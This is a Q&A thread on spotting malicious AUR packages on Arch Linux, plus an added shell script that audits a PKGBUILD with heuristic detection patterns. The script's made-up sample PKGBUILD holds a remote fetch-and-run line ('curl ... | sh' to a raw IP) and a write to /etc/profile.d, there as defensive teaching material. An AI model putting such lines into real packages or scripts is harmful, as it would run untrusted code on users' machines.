How do I recognize whether a package installed via yaourt on Arch Linux could be harmful to my PC? I read in the wiki that I should check every installation I make with yaourt. But what exactly do I have to check, and how do I recognize malicious packages?
You should use official packages without the AUR. There is no guarantee, because anybody can upload anything to the AUR; only a registration is needed. Checking the comments and votes of AUR packages may be a good starting point. – uzsolt Nov 11 '13 at 13:37
The wiki instruction is to read the PKGBUILD before proceeding with the install... – jasonwryan Nov 11 '13 at 16:37
@uzsolt That is faintly ridiculous: there are a lot of great packages in the AUR, some of which have been moved from the official repos. Using AUR packages, in principle, is fine; what is important is *understanding* what you are installing. – jasonwryan Nov 11 '13 at 16:39
That is doubtless, but how can anybody know whether the `aur-foo` package is harmful or not? Does a general rule or algorithm exist? I think not. And reading the PKGBUILD isn't enough: think of installing a harmful C program. Do you read the full source code before installing? I think one should check the comments (for reports, warnings) and the votes (if there are many, many votes it seems not so bad). I'm using many AUR packages and I think most of them are good. But... the devil never sleeps :) – uzsolt Nov 11 '13 at 18:37
2 Answers
You can't, not really, without doing an extensive audit of the code and observing it in action "from the outside", for example using a virtual machine. There is no bulletproof way to find malicious packages, and certainly no automated way which couldn't be circumvented relatively easily. Some things you can realistically do, none of which are silver bullets:
- Download the package, unpack it (don't install it!) and run a virus check on the unpacked files. This can find some well-known problems, but not targeted or custom hacks.
- Before using it, install it on a virtual machine and check that it doesn't do anything "suspicious", such as touching files it shouldn't, communicating with outside servers, starting daemon processes on its own, etc. Of course, it could be doing things like that on a timed basis, for example after running for X hours, and there's no way you'd know without detailed inspection of the code. Rootkit detectors can automate some of this.
- Install in a restricted environment. SELinux, chroot jails, virtual machines, separate disconnected machines, and many other things can contain different types of problematic software, from the plain bad to the actively malicious.
- Valuable (but not secret) data can be placed on separate servers with read-only access given to the untrusted machine.
- Secret data should be placed on a machine which is unreachable from the untrusted machine. Any communication should be manual copies via removable media.
Finally, the only secure software is no software. Are you sure you need to install software you don't trust? Is there no well-known, trusted alternative?
Well, I just followed the wiki entries for xflux and the Sun JDK. Does your guide apply to every entry in the AUR, or can I trust packages that have an extensive wiki.archlinux article? – lup3x Nov 11 '13 at 15:38
Nobody can tell you who to trust. Nobody knows who to trust. All you can do is make a judgement call based on your own experience, the advice of people you trust, the popularity of the package, or any other heuristic you judge to be sufficient. – l0b0 Nov 11 '13 at 15:45
@Sparhawk Good, we're on the Internet after all, and who to trust *has* to be a personal decision. – l0b0 Feb 03 '15 at 08:25
As mentioned before, you can't know for sure.
The main heuristics I personally use are:
- read the PKGBUILD and find out what websites it is downloading the software from. Is it where you expected? Is it from a trusted source? Take spotify for instance, its source is 'http://repository.spotify.com/pool/non-free/s/spotify-client/spotify-client_1.0.15.137.gbdf68615_amd64.deb'
If I were going to install this manually I'd be downloading it from spotify.com anyway, so this is okay in my books. A brief skim of the rest of the PKGBUILD shows nothing obviously unusual. Of course there are ways to be sneaky, but I think the main target for any malicious code on the AUR would be people using yaourt etc. who don't usually read the PKGBUILD before they install software and wouldn't spot the problem even if it was obvious.
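As an added example that is not part of either answer and not code from Arch, yaourt or makepkg, the POSIX shell script below turns the advice in both answers (read the PKGBUILD, check where the sources are downloaded from, look at what it does before you build or install it) into a repeatable pre-install review. The PKGBUILD it inspects is constructed for the demonstration: the package name, the example.com and 203.0.113.5 hosts and the hashes are made up, and the pattern list is a heuristic that catches only the clumsy cases, not a malware scanner.

```shell
#!/bin/sh
# Added example (not from the original thread, not an Arch tool): a pre-install
# review of a PKGBUILD. It lists the download sources, the remote hosts to compare
# against the upstream site you expect, and flags constructs that deserve a close
# read. Heuristic only: no findings does not mean the PKGBUILD is safe.

# Constructed sample PKGBUILD. Package name, hosts (example.com, the 203.0.113.0/24
# documentation range) and checksums are made up for this demonstration.
SAMPLE_PKGBUILD='pkgname=example-client
pkgver=1.0.0
pkgrel=1
arch=("x86_64")
url="https://www.example.com"
source=("https://repository.example.com/pool/example-client_1.0.0_amd64.deb"
        "example-client.desktop"
        "helper.sh::http://203.0.113.5/h.sh")
sha256sums=("SKIP"
            "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
            "SKIP")

package() {
  bsdtar -xf "$srcdir/example-client_1.0.0_amd64.deb" -C "$pkgdir"
  install -Dm644 example-client.desktop "$pkgdir/usr/share/applications/example-client.desktop"
  curl -s http://203.0.113.5/post.sh | sh
  echo "export PATH=/opt/x:$PATH" > /etc/profile.d/x.sh
}'

write_sample_pkgbuild() {            # $1 = destination path
  printf '%s\n' "$SAMPLE_PKGBUILD" > "$1"
}

# Every entry of the source=() / source_<arch>=() arrays, one per line, with
# quotes and any "localname::" prefix stripped. Entries without a scheme are
# files shipped next to the PKGBUILD.
pkgbuild_sources() {                 # $1 = PKGBUILD path
  awk '
    /^source(_[A-Za-z0-9_]+)?=\(/ { insrc = 1; sub(/^source[A-Za-z0-9_]*=\(/, "") }
    insrc { done = sub(/\).*$/, ""); print; if (done) insrc = 0 }
  ' "$1" |
    tr -s '[:space:]' '\n' |
    sed -e '/^$/d' -e 's/["'"'"']//g' -e 's/^[^/:]*:://'
}

# Hosts of the remote sources; this is the list to compare with the upstream
# site you would download from by hand.
source_hosts() {                     # $1 = PKGBUILD path
  pkgbuild_sources "$1" |
    sed -n 's#^[A-Za-z][A-Za-z0-9+.-]*://\([^/]*\).*#\1#p' | LC_ALL=C sort -u
}

_flag() {                            # $1 = rule, $2 = extended regex, $3 = file
  grep -nE "$2" "$3" | sed "s/^/$1:/"
}

# Findings as <rule>:<line>:<text>. Always returns 0; count_warnings gives the number.
pkgbuild_warnings() {                # $1 = PKGBUILD path
  _flag pipe-to-shell      '(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh' "$1"
  _flag base64-decode      'base64[[:space:]]+(-d|--decode)' "$1"
  _flag eval               '(^|[[:space:];&|])eval[[:space:]]' "$1"
  _flag sudo               '(^|[[:space:];&|])sudo[[:space:]]' "$1"
  # Anything written to an absolute system path instead of under $pkgdir.
  _flag writes-outside-pkgdir \
    '(>|[[:space:]](cp|mv|install|ln|chmod|chown)[[:space:]])[^#]*[[:space:]]/(etc|usr|var|home|root|boot|opt)/' "$1"
  _flag raw-ip-source      'https?://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' "$1"
  _flag checksum-skipped   '^(md5|sha[0-9]+|b2)sums.*SKIP' "$1"
  return 0
}

count_warnings() {                   # $1 = PKGBUILD path
  pkgbuild_warnings "$1" | wc -l | tr -d ' '
}

# Full report; returns 1 when anything was flagged so it can gate a build script.
review_pkgbuild() {                  # $1 = PKGBUILD path
  echo "== sources =="
  pkgbuild_sources "$1"
  echo "== remote hosts (compare with the upstream site you expect) =="
  source_hosts "$1"
  echo "== findings =="
  out=$(pkgbuild_warnings "$1")
  if [ -n "$out" ]; then
    printf '%s\n' "$out"
    return 1
  fi
  echo "none (still read the whole file)"
}

tmp=$(mktemp -d)
write_sample_pkgbuild "$tmp/PKGBUILD"
review_pkgbuild "$tmp/PKGBUILD" || echo "review flagged items; do not build this blindly"
```

On the constructed sample the report shows two remote hosts, of which only repository.example.com matches the upstream `url`, and flags the raw-IP source, the `curl ... | sh` in `package()`, the write to `/etc/profile.d/` outside `$pkgdir`, and the skipped checksums. On a real system, the step that follows a clean review is to build without installing (`makepkg -s` builds; only `-i` installs), list the resulting `*.pkg.tar*` with `bsdtar -tf` to see every path it would create, and only then `pacman -U` it, ideally first in the virtual machine the first answer recommends.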